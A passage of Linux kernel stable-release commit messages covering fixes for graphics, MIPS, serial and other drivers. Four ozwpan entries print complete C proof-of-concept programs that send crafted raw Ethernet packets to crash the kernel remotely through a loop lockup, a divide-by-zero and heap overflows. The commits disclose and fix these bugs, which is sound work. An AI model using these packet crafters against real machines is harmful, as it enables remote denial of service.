Since the SDMA UART ROM script doesn't clear the IDLE bit itself, this
caused repeated 1-byte DMA transfers, regardless of available data in the
RX FIFO. Also, when returning due to the IDLE condition, the UART ROM
script already increased its counter, causing residue to be off by one.

This patch clears the IDLE condition to avoid repeated 1-byte DMA transfers
and decreases count by when the DMA transfer was aborted due to the IDLE
condition, fixing serial transfers using DMA on i.MX6Q.

Reported-by: Peter Seiderer <ps.report@gmx.net>
Signed-off-by: Philipp Zabel <p.zabel@pengutronix.de>
Tested-by: Fabio Estevam <fabio.estevam@freescale.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

drm/radeon: Make sure radeon_vm_bo_set_addr always unreserves the BO

commit ee18e599251ed06bf0c8ade7c434a0de311342ca upstream.

Some error paths didn't unreserve the BO. This resulted in a deadlock
down the road on the next attempt to reserve the (still reserved) BO.

Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=90873
Reviewed-by: Christian König <christian.koenig@amd.com>
Signed-off-by: Michel Dänzer <michel.daenzer@amd.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

Revert "drm/radeon: adjust pll when audio is not enabled"

commit ebb9bf18636926d5da97136c22e882c5d91fda73 upstream.

This reverts commit 7fe04d6fa824ccea704535a597dc417c8687f990.

Fixes some systems at the expense of others. Need to properly
fix the pll divider selection.

bug:
https://bugzilla.kernel.org/show_bug.cgi?id=99651

Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

Revert "drm/radeon: don't share plls if monitors differ in audio support"

commit 6fb3c025fee16f11ebd73f84f5aba1ee9ce7f8c6 upstream.

This reverts commit a10f0df0615abb194968fc08147f3cdd70fd5aa5.

Fixes some systems at the expense of others. Need to properly
fix the pll divider selection.

bug:
https://bugzilla.kernel.org/show_bug.cgi?id=99651

Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

drm/radeon: fix freeze for laptop with Turks/Thames GPU.

commit 6dfd197283bffc23a2b046a7f065588de7e1fc1e upstream.

Laptop with Turks/Thames GPU will freeze if dpm is enabled. It seems
the SMC engine is relying on some state inside the CP engine. CP needs
to chew at least one packet for it to get in good state for dynamic
power management.

This patch simply disabled and re-enable DPM after the ring test which
is enough to avoid the freeze.

Signed-off-by: Jérôme Glisse <jglisse@redhat.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

drm/i915: Fix DDC probe for passive adapters

commit 3f5f1554ee715639e78d9be87623ee82772537e0 upstream.

Passive DP->DVI/HDMI dongles on DP++ ports show up to the system as HDMI
devices, as they do not have a sink device in them to respond to any AUX
traffic. When probing these dongles over the DDC, sometimes they will
NAK the first attempt even though the transaction is valid and they
support the DDC protocol. The retry loop inside of
drm_do_probe_ddc_edid() would normally catch this case and try the
transaction again, resulting in success.

That, however, was thwarted by the fix for [1]:

commit 9292f37e1f5c79400254dca46f83313488093825
Author: Eugeni Dodonov <eugeni.dodonov@intel.com>
Date:   Thu Jan 5 09:34:28 2012 -0200

    drm: give up on edid retries when i2c bus is not responding

This added code to exit immediately if the return code from the
i2c_transfer function was -ENXIO in order to reduce the amount of time
spent in waiting for unresponsive or disconnected devices. That was
possible because the underlying i2c bit banging algorithm had retries of
its own (which, of course, were part of the reason for the bug the
commit fixes).

Since its introduction in

commit f899fc64cda8569d0529452aafc0da31c042df2e
Author: Chris Wilson <chris@chris-wilson.co.uk>
Date:   Tue Jul 20 15:44:45 2010 -0700

    drm/i915: use GMBUS to manage i2c links

we've been flipping back and forth enabling the GMBUS transfers, but
we've settled since then. The GMBUS implementation does not do any
retries, however, bailing out of the drm_do_probe_ddc_edid() retry loop
on first encounter of -ENXIO. This, combined with Eugeni's commit, broke
the retry on -ENXIO.

Retry GMBUS once on -ENXIO on first message to mitigate the issues with
passive adapters.

This patch is based on the work, and commit message, by Todd Previte
<tprevite@gmail.com>.

[1] https://bugs.freedesktop.org/show_bug.cgi?id=41059

v2: Don't retry if using bit banging.

v3: Move retry within gmbux_xfer, retry only on first message.

v4: Initialize GMBUS0 on retry (Ville).

v5: Take index reads into account (Ville).

Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=85924
Cc: Todd Previte <tprevite@gmail.com>
Tested-by: Oliver Grafe <oliver.grafe@ge.com> (v2)
Tested-by: Jim Bride <jim.bride@linux.intel.com>
Reviewed-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

drm/i915: Don't skip request retirement if the active list is empty

commit 0aedb1626566efd72b369c01992ee7413c82a0c5 upstream.

Apparently we can have requests even if though the active list is empty,
so do the request retirement regardless of whether there's anything
on the active list.

The way it happened here is that during suspend intel_ring_idle()
notices the olr hanging around and then proceeds to get rid of it by
adding a request. However since there was nothing on the active lists
i915_gem_retire_requests() didn't clean those up, and so the idle work
never runs, and we leave the GPU "busy" during suspend resulting in a
WARN later.

Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

drm/i915/hsw: Fix workaround for server AUX channel clock divisor

commit e058c945e03a629c99606452a6931f632dd28903 upstream.

According to the HSW b-spec we need to try clock divisors of 63
and 72, each 3 or more times, when attempting DP AUX channel
communication on a server chipset. This actually wasn't happening
due to a short-circuit that only checked the DP_AUX_CH_CTL_DONE bit
in status rather than checking that the operation was done and
that DP_AUX_CH_CTL_TIME_OUT_ERROR was not set.

[v2] Implemented alternate solution suggested by Jani Nikula.

Signed-off-by: Jim Bride <jim.bride@linux.intel.com>
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

drm/radeon: use proper ACR regisiter for DCE3.2

commit 091f0a70ffe2a1297d52fe32d6c6794d955e01e5 upstream.

Using the DCE2 one by accident afer the audio rework.

Bug:
https://bugs.freedesktop.org/show_bug.cgi?id=90777

Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

drm/amdkfd: fix topology bug with capability attr.

commit 826f5de84ceb6f96306ce4081b75a0539d8edd00 upstream.

This patch fixes a bug where the number of watch points
was shown before it was actually calculated

Signed-off-by: Alexey Skidanov <Alexey.Skidanov@amd.com>
Signed-off-by: Oded Gabbay <oded.gabbay@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ARM: dts: am335x-boneblack: disable RTC-only sleep to avoid hardware damage

commit 7a6cb0abe1aa63334f3ded6d2b6c8eca80e72302 upstream.

Avoid entering "RTC-only mode" at poweroff. It is unsupported by most
versions of BeagleBone, and risks hardware damage.

The damaging configuration is having system-power-controller
without ti,pmic-shutdown-controller.

Reported-by: Matthijs van Duin <matthijsvanduin@gmail.com>
Tested-by: Matthijs van Duin <matthijsvanduin@gmail.com>
Signed-off-by: Robert Nelson <robertcnelson@gmail.com>
Cc: Tony Lindgren <tony@atomide.com>
Cc: Felipe Balbi <balbi@ti.com>
Cc: Johan Hovold <johan@kernel.org>
[Matthijs van Duin: added explanatory comments]
Signed-off-by: Matthijs van Duin <matthijsvanduin@gmail.com>
Fixes: http://bugs.elinux.org/issues/143
[tony@atomide.com: updated comments with the hardware breaking info]
Signed-off-by: Tony Lindgren <tony@atomide.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

pata_octeon_cf: fix broken build

commit 4710f2facb5c68d629015747bd09b37203e0d137 upstream.

MODULE_DEVICE_TABLE is referring to wrong driver's table and breaks the
build. Fix that.

Signed-off-by: Aaro Koskinen <aaro.koskinen@nokia.com>
Signed-off-by: Tejun Heo <tj@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ozwpan: unchecked signed subtraction leads to DoS

commit 9a59029bc218b48eff8b5d4dde5662fd79d3e1a8 upstream.

The subtraction here was using a signed integer and did not have any
bounds checking at all. This commit adds proper bounds checking, made
easy by use of an unsigned integer. This way, a single packet won't be
able to remotely trigger a massive loop, locking up the system for a
considerable amount of time. A PoC follows below, which requires
ozprotocol.h from this module.

=-=-=-=-=-=

#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>

#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"

static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}

int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}

uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}

int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}

struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;

struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
struct oz_elt oz_elt2;
struct oz_multiple_fixed oz_multiple_fixed;
} __packed packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 0,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
},
.oz_elt2 = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_multiple_fixed) - 3
},
.oz_multiple_fixed = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_USB_ENDPOINT_DATA,
.endpoint = 0,
.format = OZ_DATA_F_MULTIPLE_FIXED,
.unit_size = 1,
.data = {0}
}
};

struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};

if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}

Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ozwpan: divide-by-zero leading to panic

commit 04bf464a5dfd9ade0dda918e44366c2c61fce80b upstream.

A network supplied parameter was not checked before division, leading to
a divide-by-zero. Since this happens in the softirq path, it leads to a
crash. A PoC follows below, which requires the ozprotocol.h file from
this module.

=-=-=-=-=-=

#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>

#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"

static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}

int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}

uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}

int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}

struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;

struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
struct oz_elt oz_elt2;
struct oz_multiple_fixed oz_multiple_fixed;
} __packed packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 0,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
},
.oz_elt2 = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_multiple_fixed)
},
.oz_multiple_fixed = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_USB_ENDPOINT_DATA,
.endpoint = 0,
.format = OZ_DATA_F_MULTIPLE_FIXED,
.unit_size = 0,
.data = {0}
}
};

struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};

if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}

Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ozwpan: Use unsigned ints to prevent heap overflow

commit b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c upstream.

Using signed integers, the subtraction between required_size and offset
could wind up being negative, resulting in a memcpy into a heap buffer
with a negative length, resulting in huge amounts of network-supplied
data being copied into the heap, which could potentially lead to remote
code execution.. This is remotely triggerable with a magic packet.
A PoC which obtains DoS follows below. It requires the ozprotocol.h file
from this module.

=-=-=-=-=-=

#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>

#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"

static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}

int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}

uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}

int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}

struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;

struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};

struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp)
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(2),
.total_size = htole16(1),
.rcode = 0,
.data = {0}
}
};

struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};

if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}

Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ozwpan: Use proper check to prevent heap overflow

commit d114b9fe78c8d6fc6e70808c2092aa307c36dc8e upstream.

Since elt->length is a u8, we can make this variable a u8. Then we can
do proper bounds checking more easily. Without this, a potentially
negative value is passed to the memcpy inside oz_hcd_get_desc_cnf,
resulting in a remotely exploitable heap overflow with network
supplied data.

This could result in remote code execution. A PoC which obtains DoS
follows below. It requires the ozprotocol.h file from this module.

=-=-=-=-=-=

#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>

#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"

static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}

int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}

uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}

int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}

struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;

struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};

struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp) - 2
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(0),
.total_size = htole16(0),
.rcode = 0,
.data = {0}
}
};

struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};

if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}

Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

MIPS: KVM: Do not sign extend on unsigned MMIO load

commit ed9244e6c534612d2b5ae47feab2f55a0d4b4ced upstream.

Fix possible unintended sign extension in unsigned MMIO loads by casting
to uint16_t in the case of mmio_needed != 2.

Signed-off-by: Nicholas Mc Guire <hofrat@osadl.org>
Reviewed-by: James Hogan <james.hogan@imgtec.com>
Tested-by: James Hogan <james.hogan@imgtec.com>
Cc: Gleb Natapov <gleb@kernel.org>
Cc: Paolo Bonzini <pbonzini@redhat.com>
Cc: kvm@vger.kernel.org
Cc: linux-mips@linux-mips.org
Cc: linux-kernel@vger.kernel.org
Patchwork: https://patchwork.linux-mips.org/patch/9985/
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

MIPS: Fix enabling of DEBUG_STACKOVERFLOW

commit 5f35b9cd553fd64415b563497d05a563c988dbd6 upstream.

Commit 334c86c494b9 ("MIPS: IRQ: Add stackoverflow detection") added
kernel stack overflow detection, however it only enabled it conditional
upon the preprocessor definition DEBUG_STACKOVERFLOW, which is never
actually defined. The Kconfig option is called DEBUG_STACKOVERFLOW,
which manifests to the preprocessor as CONFIG_DEBUG_STACKOVERFLOW, so
switch it to using that definition instead.

Fixes: 334c86c494b9 ("MIPS: IRQ: Add stackoverflow detection")
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Cc: Ralf Baechle <ralf@linux-mips.org>
Cc: Adam Jiang <jiang.adam@gmail.com>
Cc: linux-mips@linux-mips.org
Patchwork: http://patchwork.linux-mips.org/patch/10531/
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

MIPS: ralink: Fix clearing the illegal access interrupt

commit 9dd6f1c166bc6e7b582f6203f2dc023ec65e3ed5 upstream.

Due to a typo the illegal access interrupt is never cleared in by
the interupt handler, causing an effective deadlock on the first
illegal access.

This was broken since the code was introduced in 5433acd81e87 ("MIPS:
ralink: add illegal access driver"), but only exposed when the Kconfig
symbol was added, thus enabling the code.

Fixes: a7b7aad383c ("MIPS: ralink: add missing symbol for RALINK_ILL_ACC")
Signed-off-by: Jonas Gorski <jogo@openwrt.org>
Cc: linux-mips@linux-mips.org
Cc: John Crispin <blogic@openwrt.org>
Patchwork: https://patchwork.linux-mips.org/patch/10172/
Signed-off-by: Ralf Baechle <ralf@linux-mips.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ring-buffer-benchmark: Fix the wrong sched_priority of producer

commit 108029323910c5dd1ef8fa2d10da1ce5fbce6e12 upstream.

The producer should be used producer_fifo as its sched_priority,
so correct it.

Link: http://lkml.kernel.org/r/1433923957-67842-1-git-send-email-long.wanglong@huawei.com
Signed-off-by: Wang Long <long.wanglong@huawei.com>
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

x86/asm/irq: Stop relying on magic JMP behavior for early_idt_handlers

commit 425be5679fd292a3c36cb1fe423086708a99f11a upstream.

The early_idt_handlers asm code generates an array of entry
points spaced nine bytes apart.  It's not really clear from that
code or from the places that reference it what's going on, and
the code only works in the first place because GAS never
generates two-byte JMP instructions when jumping to global
labels.

